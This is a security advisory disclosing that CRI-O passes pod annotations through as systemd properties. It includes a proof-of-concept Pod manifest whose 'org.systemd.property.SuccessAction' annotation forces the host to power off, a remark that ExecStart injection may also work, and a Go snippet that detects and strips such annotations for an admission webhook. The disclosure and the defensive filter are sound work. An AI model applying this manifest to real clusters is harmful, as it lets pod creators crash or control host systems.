On CRI-O, it looks like an arbitrary systemd property can be injected via a Pod annotation:
```yaml
---
apiVersion: v1
kind: Pod
metadata:
  name: poc-arbitrary-systemd-property-injection
  annotations:
    # I believe that ExecStart with an arbitrary command works here too,
    # but I haven't figured out how to marshal the ExecStart struct to a gvariant string.
    org.systemd.property.SuccessAction: "'poweroff-force'"
spec:
  containers:
  - name: hello
    image: quay.io/podman/hello
```
This means that any user who can create a pod with an arbitrary annotation may perform an arbitrary action on the host system.
Impact
Tested with CRI-O v1.24 on minikube.
I didn't test the latest v1.29 because it is incompatible with minikube: kubernetes/minikube#18367
Thanks to Cédric Clerget (GitHub ID @cclerget) for finding out that CRI-O just passes pod annotations to OCI annotations:
opencontainers/runc#3923 (comment)
CRI-O has to filter out annotations that have the prefix "org.systemd.property.".
See also:
Workarounds
Unfortunately, the only workarounds would involve an external mutating webhook to disallow these annotations.
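The filtering that the fix requires and the webhook workaround both come down to the same check: find pod annotations under the "org.systemd.property." prefix before they reach the OCI runtime. The following is an added example, not CRI-O's or any project's code; the function name, the minimal Pod struct and the sample manifest are assumptions constructed for illustration. It returns the offending keys together with a JSON Patch a mutating admission webhook could send back to strip them (a validating webhook would instead deny when the key list is non-empty).

```go
package main

import (
	"encoding/json"
	"sort"
	"strings"
)
// Annotation namespace that the systemd cgroup driver turns into unit properties.
const systemdPropertyPrefix = "org.systemd.property."

// Minimal view of a Pod (hypothetical type): only the annotations matter here.
type podMeta struct {
	Metadata struct {
		Annotations map[string]string `json:"annotations"`
	} `json:"metadata"`
}
// One JSON Patch operation, the format a mutating admission webhook returns.
type patchOp struct {
	Op   string `json:"op"`
	Path string `json:"path"`
}

// escapePointer escapes a key for use in a JSON Pointer path (RFC 6901).
func escapePointer(key string) string {
	return strings.ReplaceAll(strings.ReplaceAll(key, "~", "~0"), "/", "~1")
}

// stripSystemdProperties returns the annotation keys that would be forwarded as
// systemd properties, plus a JSON Patch that removes them from the Pod.
func stripSystemdProperties(podJSON []byte) (keys []string, patch []byte, err error) {
	var pod podMeta
	if err := json.Unmarshal(podJSON, &pod); err != nil {
		return nil, nil, err
	}
	for k := range pod.Metadata.Annotations {
		if strings.HasPrefix(k, systemdPropertyPrefix) {
			keys = append(keys, k)
		}
	}
	sort.Strings(keys) // deterministic patch order regardless of map iteration
	ops := []patchOp{} // empty slice marshals to "[]", not "null"
	for _, k := range keys {
		ops = append(ops, patchOp{Op: "remove", Path: "/metadata/annotations/" + escapePointer(k)})
	}
	patch, err = json.Marshal(ops)
	return keys, patch, err
}

// samplePod is a constructed manifest carrying the same annotation as the PoC above.
const samplePod = `{"apiVersion":"v1","kind":"Pod","metadata":{"name":"poc","annotations":{"app":"hello","org.systemd.property.SuccessAction":"'poweroff-force'"}}}`
```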
References